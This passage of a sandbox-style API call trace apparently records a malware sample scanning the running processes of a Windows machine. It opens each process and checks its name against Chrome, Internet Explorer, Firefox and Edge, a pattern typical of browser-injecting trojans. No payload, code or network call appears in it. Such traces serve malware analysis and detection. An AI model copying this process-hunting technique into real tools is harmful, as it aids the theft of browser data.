	[0213.359] NtQueryInformationProcess (in: ProcessHandle=0x4064, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0213.359] ReadProcessMemory (in: hProcess=0x4064, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0213.360] ReadProcessMemory (in: hProcess=0x4064, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0213.360] ReadProcessMemory (in: hProcess=0x4064, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0213.360] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0213.360] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0213.361] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x4068
	[0213.361] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.361] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0213.361] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.361] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.361] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.361] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0213.362] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.362] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.362] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0213.362] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x406c
	[0213.363] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.363] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0213.363] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.364] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.364] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.364] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0213.364] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.364] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.364] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0213.365] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x4070
	[0213.365] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.365] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0213.365] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.366] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.366] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.366] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0213.366] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.366] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.366] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0213.367] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0213.368] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x4074
	[0213.368] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.368] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0213.368] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.368] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.368] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.368] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0213.369] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.369] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.369] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0213.369] CloseHandle (hObject=0x188) returned 1
	[0213.370] Sleep (dwMilliseconds=0x64) 
	[0213.472] GetCurrentProcessId () returned 0x110
	[0213.472] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0213.478] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0213.480] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0213.482] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0213.483] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x4078
	[0213.484] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.484] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0213.484] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.484] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.485] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.485] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0213.485] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.485] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.486] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0213.486] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x407c
	[0213.486] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.486] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0213.487] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.487] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.487] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.487] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0213.487] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.487] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.487] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0213.488] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x4080
	[0213.488] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.488] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0213.489] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.489] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.489] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.489] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0213.489] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.489] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.490] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0213.490] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x4084
	[0213.490] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.490] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0213.491] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.491] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.491] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.491] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0213.491] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.491] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.491] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0213.492] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x4088
	[0213.492] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.492] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0213.492] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.493] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.493] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.493] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0213.493] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.493] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.493] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0213.494] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x408c
	[0213.494] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.494] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0213.494] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.495] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.495] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.495] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0213.495] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.495] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.495] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0213.496] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x4090
	[0213.496] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.496] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0213.496] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.496] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.497] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.497] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0213.497] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.497] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.497] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0213.498] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x4094
	[0213.498] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.498] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0213.498] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.498] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.498] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.498] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0213.499] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.499] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.499] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0213.499] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x4098
	[0213.500] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.500] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0213.500] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.500] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.500] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.500] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0213.501] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.501] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.501] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0213.501] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x409c
	[0213.502] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.502] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0213.502] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.502] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.502] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.502] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0213.503] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.503] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.503] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0213.503] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x40a0
	[0213.504] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.504] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0213.504] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.504] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.504] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.504] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0213.505] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.505] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.505] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0213.506] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x40a4
	[0213.506] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.506] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0213.506] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.506] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.506] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.506] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0213.507] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.507] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.507] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0213.507] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x40a8
	[0213.508] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.508] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0213.508] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.508] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.508] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.508] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0213.509] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.509] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.509] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0213.509] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x40ac
	[0213.510] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.510] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0213.510] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.510] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.510] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.510] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0213.511] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.511] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.511] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0213.511] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x40b0
	[0213.512] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.512] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0213.512] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.512] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.512] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.512] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0213.512] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.513] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.513] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0213.513] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x40b4
	[0213.513] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.514] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0213.514] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.514] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.514] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.514] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0213.514] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.514] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.515] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0213.515] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x40b8
	[0213.515] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.515] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0213.516] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.516] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.516] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.516] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0213.516] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.516] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.517] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0213.517] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x40bc
	[0213.517] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.517] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0213.527] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.527] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.527] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.527] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0213.527] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.527] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.528] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0213.528] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x40c0
	[0213.528] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.529] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0213.529] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.529] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.529] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
